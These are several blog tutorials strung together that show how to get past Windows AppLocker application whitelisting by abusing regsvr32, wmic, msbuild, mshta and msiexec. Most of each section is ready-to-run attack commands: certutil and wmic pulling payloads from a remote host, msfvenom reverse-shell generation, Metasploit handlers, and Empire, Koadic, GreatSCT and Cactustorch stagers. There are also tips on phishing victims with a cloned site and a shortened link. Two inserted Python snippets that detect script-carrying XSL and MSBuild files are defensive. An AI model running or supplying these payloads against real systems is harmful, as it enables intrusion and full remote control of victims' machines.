And simultaneously, in the same script used in the previous method, inject a certutil.exe command to fetch shell.exe from the remote server. So, instead of “calc.exe”, write the following and save the file again with the .sct extension:

certutil.exe -urlcache -split -f http://192.168.1.109/shell.exe

We have used certutil here because it can download a file on Windows; this file is saved as 3.sct.

Now, run the above script using the following command:

regsvr32 /u /n /s /i:http://192.168.1.109/3.sct scrobj.dll

We will create another file to execute our previous file, shell.exe. For that, take the same script again and where it says “calc.exe” write:

cmd /k cd c:\Users\raj & shell.exe

We have saved this script as 4.sct; run it using the following command:

regsvr32 /u /n /s /i:http://192.168.1.109/4.sct scrobj.dll

Side by side, start the multi handler too, to get a session. Hence, type:

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

After running the command on the victim’s PC, you will have a meterpreter session.

Koadic

Our next method is using Koadic. Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and PowerShell Empire. To know more about Koadic, please read our detailed article on the said framework through this link: https://www.hackingarticles.in/koadic-com-command-control-framework

Once Koadic is up and running, type:

use stager/js/regsvr
set srvhost 192.168.1.107
run

After this, type the following in the command prompt of the victim’s PC:

regsvr32 /u /n /s /i:http://192.168.1.107:9998/uWBjv scrobj.dll

Once you run the above command, you will have a session. To access the session type :

zombie 0

JSRat

Our next method of attacking with regsvr32 is by using JSRat, which you can download from GitHub. This is another very small command and control framework, just like Koadic and PowerShell Empire, for generating malicious tasks only for rundll32.exe and regsvr32.exe. JSRat will create a web server and on that web server we will find our .sct file. To use this method type:

./JSRat.py -I 192.168.1.107 -p 4444

Running the above command will start the web server.

Open this in your browser as shown below. Here, you will find the .sct file that you need to run on your victim’s PC.

As we have got the command, run the command in the run window as shown in the image below:

After executing the command in the run window you will have a session as shown:

GreatSCT

GreatSCT is a tool that allows you to use Metasploit exploits and lets them bypass most anti-viruses. GreatSCT is currently maintained by @ConsciousHacker. You can download it from

https://github.com/GreatSCT/GreatSCT

Once it’s downloaded and running, type the following command to access the modules:

use Bypass

Then type ‘list’ to get the list of modules.

The list of modules will appear as shown in the image below:

From the list of modules choose the following:

use regsvr/shellcode_inject/base64_migrate.py
generate

After the above commands, type 1 to choose MSFVenom.

Then it will ask you for a payload. Just press enter, as it will take windows/meterpreter/reverse_tcp as the default payload and that is the one we need. After that provide the IP (here we have given 192.168.1.107) and then a port of your choice; as you can see in the image below, we have given lport as 2345.

After giving the details, it will ask you for a name for your malware. By default it will set the name ‘payload’, so either give a name or just press enter for the default setting.

As soon as you press enter it will generate two files: one will be a resource file and the other a .sct file.

Now, first, start the Python server in /usr/share/greatsct-output by typing:

python -m SimpleHTTPServer 80

Now execute the .sct file in the run window of the victim’s PC as shown below.

Simultaneously, start the multi/handler using the resource file. For this, type:

msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

And you have a meterpreter session.

Conclusion

Using regsvr32 to gain a session is quite an unusual way, but it’s very important. The above-mentioned methods use different tools and software to allow us to perform this attack.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here

The post Bypass Application Whitelisting using regsrv32.exe (Multiple Methods) appeared first on Hacking Articles.

Bypass Application Whitelisting using wmic.exe (Multiple Methods)

The purpose of this post is to demonstrate the most common and familiar techniques of AppLocker whitelisting bypass. As we know, for security reasons the system admin adds group policies to restrict app execution for local users. In our previous article, we had discussed “Windows Applocker Policy – A Beginner’s Guide”, which defines the AppLocker rules for your application control policies and how to work with them. But today you will learn how to bypass AppLocker policies with wmic.exe.

Table of Content

Introduction to Wmic.exe

Exploiting Techniques

  • Koadic
  • Powershell Empire
  • Link hta within XSL code

Wmic.exe

The WMIC utility is a Microsoft tool that provides a WMI command-line interface used for a variety of administrative functions on local and remote machines; it is also used for WMI queries such as reading system settings, stopping processes and executing scripts locally or remotely. It can also invoke XSL (eXtensible Stylesheet Language) scripts.

Exploiting Techniques

Koadic

We will generate a malicious XSL file with the help of Koadic, a Command & Control tool that is quite similar to Metasploit and PowerShell Empire.

To know how koadic works, read our article from here: https://www.hackingarticles.in/koadic-com-command-control-framework/

Once installation is complete, run ./koadic to start Koadic, then load the stager/js/wmic stager with the following commands and set SRVHOST to the address the stager should call home to.

use stager/js/wmic
set SRVHOST 192.168.1.107
run

Execute the following WMIC command to download and run the malicious XSL file from the remote server:

wmic os get /FORMAT:"http://192.168.1.107:9996/g8gkv.xsl"

Once the malicious XSL file is executed on the target machine, you will have a Zombie connection, just like a Metasploit session.

PowerShell Empire

For our next method of wmic attack we will use Empire. Empire is a post-exploitation framework. Till now we have been pairing our XSL attacks with Metasploit, but in this method we will use the Empire framework. It’s a solely Python-based PowerShell Windows agent, which makes it quite useful. Empire is developed by @harmj0y, @sixdub, @enigma0x3, rvrsh3ll, @killswitch_gui, and @xorrior. You can download this framework from https://github.com/EmpireProject/Empire.

To have a basic guide of Empire, please visit our article introducing empire:

https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/

Once the Empire framework is started, type listeners to check if there are any active listeners. As you can see in the image below, there are no active listeners. So, to set up a listener type:

uselistener http
set Host http://192.168.1.107
set port 80
execute

With the above commands, you will have an active listener. Type back to go out of the listener so that you can move on to the stager.

For our wmic attack we will use a stager. A stager, in Empire, is a snippet of code that allows our malicious code to be run via the agent on the compromised host. So, for this type:

usestager windows/launcher_xml
set listener http
execute

Usestager will create a malicious code file, saved in /tmp as launcher.xml.

We have used a Python HTTP server to transfer this file to the victim’s machine.

And once the file runs, we will have the result on our listener. Run the file on your victim’s machine by typing the following command:

wmic process get brief /format:"http://192.168.1.107:8080/launcher.xsl"

To see if we have any session open, type ‘agents’. Doing so will show you the name of the session you have. To access that session type:

interact Z639YHPA
sysinfo

Link hta within XSL code

As we know, wmic can execute any file or script remotely, so we will link an hta file within XSL code. The XSL file will contain a link to download and execute a malicious hta file via mshta.exe, which is triggered by wmic.

Therefore, let’s generate an hta file with the help of Metasploit:

use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit

Now copy the URL and place it inside the XSL code, because XSL files have the ability to execute Microsoft scripting languages.

Then we created a “payload.xsl” file; you can take help from this link for writing the XSL code, and then place the link to the hta file as shown below.

Now again we need to execute the XSL file through wmic.exe with the help of the following command:

wmic os get /FORMAT:"http://192.168.1.109/payload.xsl"

Once the above command is executed you will have a session open. To access the session, type:

sessions 1
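The two wmic methods above, and the Empire one, all depend on a stylesheet that carries embedded script in MSXML's `urn:schemas-microsoft-com:xslt` namespace, which is what a defender can look for when triaging a .xsl file pulled from a proxy log or a file share. The following added example (not part of the article or of Koadic/Empire; the two stylesheets are constructed, with a placeholder comment in place of any script) parses a stylesheet and reports every embedded script block:

```python
import xml.etree.ElementTree as ET

# Namespace under which MSXML accepts script embedded in a stylesheet; this is
# what lets a /FORMAT: stylesheet run code instead of just formatting output.
MS_XSLT_NS = "urn:schemas-microsoft-com:xslt"

# Constructed sample with the shape of a script-carrying stylesheet. The script
# body is a placeholder comment, not a stager.
SUSPICIOUS_XSL = """<?xml version="1.0"?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform"
            xmlns:ms="urn:schemas-microsoft-com:xslt"
            xmlns:user="placeholder" version="1.0">
  <output method="text"/>
  <ms:script implements-prefix="user" language="JScript">
  <![CDATA[
    /* placeholder: code here runs inside wmic when the stylesheet is rendered */
  ]]>
  </ms:script>
</stylesheet>"""

# Constructed benign stylesheet: templates only, nothing executable.
BENIGN_XSL = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:output method="text"/>
  <xsl:template match="/">OS: <xsl:value-of select="//Caption"/></xsl:template>
</xsl:stylesheet>"""


def find_embedded_script(xsl_text):
    """Return (language, first line of body) for every embedded script block.

    An empty list means the stylesheet only carries ordinary XSLT constructs.
    """
    root = ET.fromstring(xsl_text)
    findings = []
    for el in root.iter():
        # ElementTree reports namespaced tags as "{namespace}localname"
        if not el.tag.startswith("{"):
            continue
        ns, local = el.tag[1:].split("}", 1)
        if ns == MS_XSLT_NS and local == "script":
            language = el.get("language", "JScript")  # MSXML's default language
            body = (el.text or "").strip()
            first_line = body.splitlines()[0] if body else ""
            findings.append((language, first_line))
    return findings


def is_suspicious(xsl_text):
    """True when the stylesheet carries any embedded script block."""
    return bool(find_embedded_script(xsl_text))


if __name__ == "__main__":
    for label, text in (("suspicious", SUSPICIOUS_XSL), ("benign", BENIGN_XSL)):
        print(label, find_embedded_script(text))
```

On the command-line side, `wmic ... /FORMAT:` pointing at an http(s) URL rather than a local .xsl is the companion signal to alert on.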

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets. Contact here

The post Bypass Application Whitelisting using wmic.exe (Multiple Methods) appeared first on Hacking Articles.

Bypass Application Whitelisting using msbuild.exe (Multiple Methods)

The purpose of this post is to demonstrate the most common and familiar techniques of AppLocker whitelisting bypass. As we know, for security reasons the system admin adds group policies to restrict app execution for local users. In our previous article, we had discussed “Windows Applocker Policy – A Beginner’s Guide”, which defines the AppLocker rules for your application control policies and how to work with them. But today you will learn how to bypass AppLocker policies with MSBuild.exe.

Table of Content

Introduction to MSbuild.exe

Exploiting Techniques

  • Generate CSharp file with Msfvenom
  • Generate XML file to Exploit MSbuild
  • Nps_payload Script
  • Powershell Empire
  • GreatSCT

Introduction to MSbuild.exe

The Microsoft Build Engine is a platform for building applications. This engine, which is also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software. Visual Studio uses MSBuild, but it doesn’t depend on Visual Studio. By invoking msbuild.exe on your project or solution file, you can organize and build products in environments where Visual Studio isn’t installed.

Visual Studio uses MSBuild to load and build managed projects. The project files in Visual Studio (.csproj, .vbproj, .vcxproj, and others) contain MSBuild XML code.

Exploiting Techniques:

Generate CSharp file with Msfvenom

We use Microsoft Visual Studio to create a C# (C Sharp) programming project with a *.csproj suffix that is saved in MSBuild format, so that it can be compiled with the MSBuild platform into an executable program.

With the help of a malicious build we can obtain a reverse shell of the victim’s machine. Therefore, we will now generate our file.csproj and for that, first generate C# shellcode via msfvenom. That shellcode will later be placed in our file.csproj, as given below.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f csharp

The shellcode above should be placed in the XML file, which you can download from GitHub; it has the code that MSBuild compiles and executes. This XML file should be saved as file.csproj and must be run via MSBuild to get a Meterpreter session.

Note: Replace the shellcode value with your C# shellcode and then rename buf to shellcode, as shown in the image below.

You can run MSBuild from Visual Studio, or from the Command Window. By using Visual Studio, you can compile an application to run on any one of several versions of the .NET Framework. For example, you can compile an application to run on the .NET Framework 2.0 on a 32-bit platform, and you can compile the same application to run on the .NET Framework 4.5 on a 64-bit platform. The ability to compile to more than one framework is named multitargeting.

To know more about MSbuild read from here: https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild?view=vs-2015

Now launch the multi handler to get a meterpreter session and run file.csproj with msbuild.exe from the target path C:\Windows\Microsoft.Net\Framework\v4.0.30319, as shown.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe file.csproj

Note: you need to save your malicious payload (XML / csproj) at this location:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ and then execute the file from the command prompt.

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

As you can observe, we have a meterpreter session of the victim, as shown below:

Generate XML file to Exploit MSbuild

As said above, MSBuild uses an XML-based project file format that’s straightforward and extensible; therefore we can rename the above-generated file.csproj as file.xml and again run file.xml with msbuild.exe from the target path C:\Windows\Microsoft.Net\Framework\v4.0.30319, as shown.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe file.xml

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

As you can observe, we have a meterpreter session of the victim, as shown below:
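What makes the .csproj and .xml variants above work is an inline task: a UsingTask with a CodeTaskFactory whose `<Code>` body MSBuild compiles and runs at build time. A defender reviewing a project file that turned up in C:\Windows\Microsoft.NET\Framework\ can check for exactly that. The following added example (not from the article, and not the GitHub XML it links to; both project files are constructed, with a placeholder comment instead of any payload) flags inline-task projects and native-memory API names inside them:

```python
import xml.etree.ElementTree as ET

# Task factories that compile source text embedded in the project file at build
# time; a project that only builds an application has no reason to use them.
INLINE_TASK_FACTORIES = {"codetaskfactory", "roslyncodetaskfactory"}
# Native-memory API names that do not belong in a build script.
SUSPICIOUS_IDENTIFIERS = ("DllImport", "VirtualAlloc", "CreateThread", "shellcode")

# Constructed sample with the shape of an inline-task project. The <Code> body is
# a placeholder comment, not the downloaded XML from the article.
INLINE_TASK_PROJECT = """<Project ToolsVersion="4.0"
         xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Run">
    <PlaceholderTask />
  </Target>
  <UsingTask TaskName="PlaceholderTask" TaskFactory="CodeTaskFactory">
    <Task>
      <Code Type="Class" Language="cs">
      <![CDATA[
        // placeholder: a real file would DllImport VirtualAlloc and CreateThread here
      ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>"""

# Constructed benign project: a normal C# build with no inline task.
BENIGN_PROJECT = """<Project ToolsVersion="4.0"
         xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup><OutputType>Exe</OutputType></PropertyGroup>
  <ItemGroup><Compile Include="Program.cs" /></ItemGroup>
  <Import Project="$(MSBuildToolsPath)\\Microsoft.CSharp.targets" />
</Project>"""


def inspect_project(project_xml):
    """Return a list of findings; an empty list means nothing inline-executable."""
    root = ET.fromstring(project_xml)
    findings = []
    for el in root.iter():
        local = el.tag.split("}", 1)[-1]   # drop the MSBuild namespace, if any
        if local == "UsingTask":
            factory = el.get("TaskFactory", "")
            if factory.lower() in INLINE_TASK_FACTORIES:
                findings.append(f"UsingTask {el.get('TaskName')} uses {factory}")
        elif local == "Code":
            body = el.text or ""
            hits = [w for w in SUSPICIOUS_IDENTIFIERS if w in body]
            if hits:
                findings.append("inline <Code> references " + ", ".join(hits))
    return findings


if __name__ == "__main__":
    print("inline-task project:", inspect_project(INLINE_TASK_PROJECT))
    print("benign project:", inspect_project(BENIGN_PROJECT))
```

Renaming file.csproj to file.xml changes nothing the parser sees, so the same check covers both methods.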

Nps_Payload Script

This script will generate payloads for basic intrusion detection avoidance. It utilizes publicly demonstrated techniques from several different sources. It is written by Larry Spohn (@Spoonman1091), with the payload written by Ben Mauch (@Ben0xA) aka dirty_ben. You can download it from GitHub.

Nps_payload generates payloads that can be executed with msbuild.exe and mshta.exe to get a reverse connection from the victim’s machine via a meterpreter session.

Follow the steps below to generate the payload:

  1. Run the ./nps_payload.py script, once you have downloaded nps_payload from GitHub.
  2. Press key 1 to select the task “generate msbuild/nps/msf”.
  3. Press key 1 again to select the payload “windows/meterpreter/reverse_tcp”.

This will generate the payload as an XML file; send this file to the target location C:\Windows\Microsoft.Net\Framework\v4.0.30319 as in the previous method, and simultaneously run the command below in a new terminal to start the listener.

msfconsole -r msbuild_nps.rc

Now repeat the above step to execute msbuild_nps.xml from the command prompt and obtain a reverse connection via meterpreter, as shown below:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe msbuild_nps.xml

PowerShell Empire

For our next method of MSBuild attack we will use Empire. Empire is a post-exploitation framework. Till now we have been pairing our MSBuild attacks with Metasploit, but in this method we will use the Empire framework. It’s a solely Python-based PowerShell Windows agent, which makes it quite useful. Empire is developed by @harmj0y, @sixdub, @enigma0x3, rvrsh3ll, @killswitch_gui, and @xorrior. You can download this framework from https://github.com/EmpireProject/Empire.

To have a basic guide of Empire, please visit our article introducing empire:

https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/

Once the Empire framework is started, type listeners to check if there are any active listeners. As you can see in the image below, there are no active listeners. So, to set up a listener type:

uselistener http
set Host http://192.168.1.107
set port 80
execute

With the above commands, you will have an active listener. Type back to go out of the listener so that you can move on to the stager.

For our MSBuild attack we will use a stager. A stager, in Empire, is a snippet of code that allows our malicious code to be run via the agent on the compromised host. So, for this type:

usestager windows/launcher_xml
set listener http
execute

Usestager will create a malicious code file, saved in /tmp as launcher.xml.

And once the file runs, we will have the result on our listener. Run the file on your victim’s machine by typing the following command:

cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\
MSBuild.exe launcher.xml

To see if we have any session open, type ‘agents’. Doing so will show you the name of the session you have. To access that session type:

interact A8H14C7L

The above command will give you access to the session.

sysinfo
info

GreatSCT

GreatSCT is a tool that allows you to use Metasploit exploits and lets them bypass most anti-viruses. GreatSCT is currently maintained by @ConsciousHacker. You can download it from here: https://github.com/GreatSCT/GreatSCT

Once it’s downloaded and running, type the following command to access the modules:

use Bypass

Now, to see the list of payloads, type:

list

Now from the list of payloads you can choose any one for your desired attack. But for this attack we will use:

use msbuild/meterpreter/rev_tcp.py

Once the command is executed, type:

set lhost 192.168.1.107
generate

When generating the payload, it will ask you for a name. By default it will take ‘payload’ as the name. We gave msbuild as the payload name; the output code is saved as XML.

Now it has made two files: one Metasploit RC file and an msbuild.xml file.

Now, first, start the Python server in /usr/share/greatsct-output/source by typing:

python -m SimpleHTTPServer 80

Run the file on your victim’s machine by typing the following command:

cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\
MSBuild.exe msbuild.xml

Simultaneously, start the multi/handler using the resource file. For this, type:

msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

And voila! We have a meterpreter session, as shown here.

Reference: https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild?view=vs-2017

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets. Contact here

The post Bypass Application Whitelisting using msbuild.exe (Multiple Methods) appeared first on Hacking Articles.

Bypass Application Whitelisting using mshta.exe (Multiple Methods)

Today we are going to learn about different methods of HTA attack. HTA is a useful and important attack because it can bypass application whitelisting. In our previous article, we had discussed “Windows Applocker Policy – A Beginner’s Guide”, which defines the AppLocker rules for your application control policies and how to work with them. But today you will learn how to bypass AppLocker policies with mshta.exe, and learning different methods of the said attack always comes in handy.

Table of content:

  • Introduction
  • Importance of HTA
  • Different methods
  • Conclusion

Introduction

For a long time, HTA files have been used as part of drive-by web attacks or as droppers for malware in the wild. This includes something as basic as redirecting mobile clients and informing them that the website does not yet have mobile support. HTA files are well known in the cybersecurity world, from both the red-team and blue-team perspectives, as one of those “retro” ways that are still useful to bypass application whitelisting.

Mshta.exe runs the Microsoft HTML Application Host, the Windows OS utility responsible for running HTA (HTML Application) files: HTML files in which we can run JavaScript or VBScript. You can interpret these files using the Microsoft mshta.exe tool.

Importance

Using .htaccess files or other strategies to redirect based on browser type will help increase success rates when using HTA files for web-based attacks. There’s a lot of flexibility inside an HTA file; you can easily make it appear to be an Adobe updater, a secure document per user, and a number of other things. It would also be useful to serve the HTA file over HTTPS, limiting detection rates for companies not using some form of SSL interception/termination. HTA files help bypass antivirus since they are still not well detected. Last but not least, HTA can also be used in web phishing, replacing the old Java Applet attack.

Methods

There are multiple methods for an HTA attack, and we are going to shine a light on almost all of them. The methods we are going to study are:

  • Metasploit
  • Setoolkit
  • Magic unicorn
  • Msfvenom
  • Empire
  • CactusTorch
  • Koadic
  • Great SCT

Metasploit

Our first method is to use an inbuilt exploit in Metasploit. For this, go to the terminal in your Kali and type:

msfconsole

Metasploit contains the “HTA Web Server” module, which generates a malicious hta file. This module hosts an HTML Application (HTA) that, when opened, will run a payload via PowerShell. When a user navigates to the HTA file they will be prompted by IE twice before the payload is executed. Once Metasploit has started, type:

use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit

Once the exploit is executed, it will give you a URL with the .hta extension. Simultaneously, Metasploit will start the server that serves the file. You then have to run this link on your victim’s PC, using the following command:

mshta.exe http://192.168.1.109:8080/pKz4Kk059Nq9.hta

The usual file extension of an HTA is .hta. We have used the above command because an HTA is treated like any executable file with the .exe extension, hence it is executed via mshta.exe. When the hta gets launched by mshta.exe, it uses a signed Microsoft binary, allowing you to call PowerShell and inject a payload directly into memory.

Once the above command is executed you will have a session open. To access the session, type:

sessions 1

Thus, you will have your meterpreter session.

Setoolkit

Our next method for HTA attack is through setoolkit. For this, open setoolkit in your Kali, and from the menu choose the first option by typing 1 to access the social engineering tools.

From the next menu, choose the second option by typing 2 to go into website attack vectors.

From the following menu choose option 8 to select the HTA attack method.

Once you have selected option 8 for the HTA attack, next you need to select option 2, which will allow you to clone a site. Once option 2 is selected, it will ask for the URL of the site you want to clone. Provide the desired URL; here we have given ‘www.ignitetechnologies.in’.

After giving the URL it will ask you to select the type of meterpreter you want. Select the third one by typing 3.

Once you hit enter after typing 3, the process will start and you will have the handler (multi/handler).

Now convert your malicious IP into a bitly link, which will appear more genuine to victims when you share it with them.

When the victim browses the above malicious link, the file will be saved and then automatically executed on the victim’s PC, as shown in the image below:

Then you will have your meterpreter session. You can use the command ‘sysinfo’ to get basic information about the victim’s PC.

Magic Unicorn

The next method for HTA attack is using the third-party tool Unicorn. Magic Unicorn is developed by Dave Kennedy. It is a user-friendly tool that allows us to perform an HTA attack by injecting shellcode straight into memory. The best part of this tool is that it’s compatible with Metasploit, along with raw shellcode and Cobalt Strike. You can have a detailed look at the software at trustedsec.com, and you can download it from GitHub or just by using this link: https://github.com/trustedsec/unicorn

Once you have downloaded Magic Unicorn, open it in the terminal of Kali and type:

python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.109 1234 hta

Executing the above command will start the process of creating an .hta file. The said .hta file will be created in the folder hta_attack/. Go into that folder and see the list of files created by typing the following commands:

cd hta_attack/
ls

Now you will be able to see an .hta file, i.e. Launcher.hta. Start the Python server so the file can be shared. To do so, type:

python -m SimpleHTTPServer 80

Once the server is up and running, execute the following command in the cmd prompt of the victim’s PC:

mshta.exe http://192.168.1.109/Launcher.hta

When the above command is executed, you will have your session activated in the multi/handler. To access the session, type:

sessions 1

MSFVenom

The next method of HTA attack is by manually creating an .hta file through msfvenom. To create the .hta file, type the following command in the terminal of Kali:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f hta-psh > shell.hta

Executing the above command will create an .hta file which you can use to your advantage. After creating the file, turn on the Python server to share the file with the victim’s PC by typing:

python -m SimpleHTTPServer 80

Run the above file by typing:

mshta.exe http://192.168.1.109/shell.hta

Simultaneously, start your handler to receive a session when you run the above file in the victim’s cmd prompt. To start the multi/handler type:

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

And so, using such an easy method, you will have your meterpreter session. You can use sysinfo to know the basics of the victim’s PC.

PowerShell Empire

For our next method of HTA attack we will use Empire. Empire is a post-exploitation framework. Till now we have been pairing our HTA attacks with Metasploit, but in this method we will use the Empire framework. It’s a solely Python-based PowerShell Windows agent, which makes it quite useful. Empire is developed by @harmj0y, @sixdub, @enigma0x3, rvrsh3ll, @killswitch_gui, and @xorrior. You can download this framework from https://github.com/EmpireProject/Empire.

To have a basic guide of Empire, please visit our article introducing empire:

https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/

Once the Empire framework is started, type listeners to check if there are any active listeners. As you can see in the image below, there are no active listeners. So, to set up a listener type:

uselistener http
set Host http://192.168.1.109
set port 80
execute

With the above commands, you will have an active listener. Type back to go out of the listener so that you can move on to the stager.

For our HTA attack we will use a stager. A stager, in Empire, is a snippet of code that allows our malicious code to be run via the agent on the compromised host. So, for this type:

usestager windows/hta
set listener http
set OutFile /root/Desktop/1.hta
execute

Usestager will create a malicious code file that will be saved at the OutFile path as 1.hta. Once the file runs, we will have the result on our listener. Run the file on your victim’s machine by typing the following command:

mshta.exe http://192.168.1.109/1.hta

To see if we have any session open, type ‘agents’. Doing so will show you the name of the session you have. To access that session type:

interact L924Z1WR

The above command will give you access to the session.

sysinfo
info

Cactustorch

Cactustorch is a framework for JavaScript and VBScript shellcode launchers. It is developed by Vincent Yiu. This tool can bypass many common defences, which is an advantage for us. The major thing to note is that the shellcode we use in Cactustorch is made through msfvenom and then encoded into Base64, as that is the only form it supports.

So, to start with, let’s first make our malware and then encode it.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f raw >1.bin

Now, to encode the file, type:

cat 1.bin |base64 -w 0

Copy the base64 output, as it is to be used later.

Now that we have our malware ready, let’s download Cactustorch. You can download it from here:

https://github.com/mdsecactivebreach/CACTUSTORCH

Once it’s installed, type the following to see the contents of the installed folder and open the hta launcher:

ls -lsa
./CACTUSTORCH.hta

The above command will start Cactustorch for the hta attack.

Once Cactustorch starts, paste the base64 code copied earlier at the highlighted space, as shown in the image below.

As we have added our code, let’s execute the file on our victim’s PC by typing:

mshta.exe http://192.168.1.109/CACTUSTORCH.hta

Simultaneously, start your multi/handler to receive a session. For multi/handler type:

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

Once you execute the file on the victim’s PC, you will have your session.

Koadic

Our next method is using Koadic. Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and PowerShell Empire. To know more about Koadic, please read our detailed article on the said framework through this link: https://www.hackingarticles.in/koadic-com-command-control-framework

Once Koadic is up and running, type info to get the gist of the details you need to provide in order to get a session. Through info you learn that you need to provide srvhost along with setting the endpoint. To set them, type:

set srvhost 192.168.1.107
set ENDPOINT sales
run

Execute the file on your victim’s PC by typing:

http://192.168.1.107:9999/sales

And you will have a session up and running. To know the name of the session type:

zombies

And now to access the session type:

zombie 0

GreatSCT

GreatSCT is a tool that allows you to use Metasploit exploits and lets them bypass most anti-viruses. GreatSCT is currently maintained by @ConsciousHacker. You can download it from here: https://github.com/GreatSCT/GreatSCT

Once it’s downloaded and running, type the following command to access the modules:

use Bypass

Now, to see the list of payloads, type:

list

Now from the list of payloads you can choose any one for your desired attack. But for this attack we will use:

use mshta/shellcode_inject/base64_migrate.py

Once the command is executed, type:

generate

After the generate command runs, it asks which method you want to use. As we are going to use msfvenom, type 1 to choose the first option. Then press enter for meterpreter, and provide the lhost and lport, i.e. 192.168.1.107 and 4321 respectively.

When generating the shellcode, it will ask you to give a name for the payload. By default it will take 'payload' as the name. As I didn't want to give any name, I simply pressed enter.

It now creates two files: a resource file and an HTA file.

First, start Python's HTTP server in /usr/share/greatsct-output by typing:

python -m SimpleHTTPServer 80

Now execute the HTA file from the command prompt on the victim's PC.

Simultaneously, start multi/handler using the resource file. For this, type:

msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

And voila! You have your session.

Conclusion

So basically, this type of attack is a simple HTA attack that gives the remote attacker full access. An attacker can create a malicious application for the Windows operating system using web technologies to clone a site. In a nutshell, it performs PowerShell injection through HTA files, which can be used for Windows-based PowerShell exploitation through the browser. The above are the methods used for the attack. As they say, if one door closes another opens; learning the same attack through different ways is therefore often convenient.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here

The post Bypass Application Whitelisting using mshta.exe (Multiple Methods) appeared first on Hacking Articles.

Bypass Application Whitelisting using msiexec.exe (Multiple Methods)

In our previous article we discussed "Windows Applocker Policy – A Beginner's Guide", which defines the AppLocker rules for your application control policies and how to work with them. Today you will learn how to bypass AppLocker policies. In this post we have blocked the cmd.exe file using a Windows AppLocker policy and try to bypass this restriction to get a command prompt as administrator.

Table of Content

Associated file formats where Applocker is applicable

Challenge 1: – Bypass Applocker with .msi file to get CMD

Little-Bit more about MSI file

Multiple Methods to get CMD

  • Generate malicious .msi file with Msfvenom -1st Method
  • Generate malicious .msi file with Msfvenom -2nd Method
  • Generate malicious .msi file with Msfvenom -3rd Method

Challenge 2: – Make a local user member of Administrative Group

  • Generate Malicious .msi file with Msfvenom -4th Method

Associated file formats where Applocker is Applicable

Windows AppLocker is a feature that was introduced in Windows 7 and Windows Server 2008 R2 as a way to restrict the use of unwanted programs. With it an administrator can restrict the execution of the following kinds of programs:

It depends entirely on the system admin which programs or scripts he wants to cover with an AppLocker policy for program restriction or execution. There could be a situation where Command Prompt (cmd.exe), PowerShell, DLL files, batch files, rundll32.exe, regsvr32, regasm and many more are blocked.

Challenge 1: – Bypass Applocker with .msi file to get CMD

Let's suppose you are in a similar situation where all the above-mentioned applications are blocked and only Windows Installer files, i.e. the .msi extension, are allowed to run without any restrictions.

Then how will you use an msi file to bypass these restrictions and get a full-privilege shell?

Little-Bit more about MSI file

The MSI name comes from the original title of the program, Microsoft Installer. Since then the name has changed to Windows Installer. An .MSI file extension file is a Windows Package Installer. An installation package contains all the information required to install or uninstall an application by Windows Installer. Each installation package contains a .msi file, which contains an installation database, a summary information stream and data streams for different parts of the installation.

The Windows Installer technology is divided into two parts that work in combination; these include a client-side installer service (Msiexec.exe) and a Microsoft Software Installation (MSI) package file. Windows Installer uses information contained in a package file to install the program.

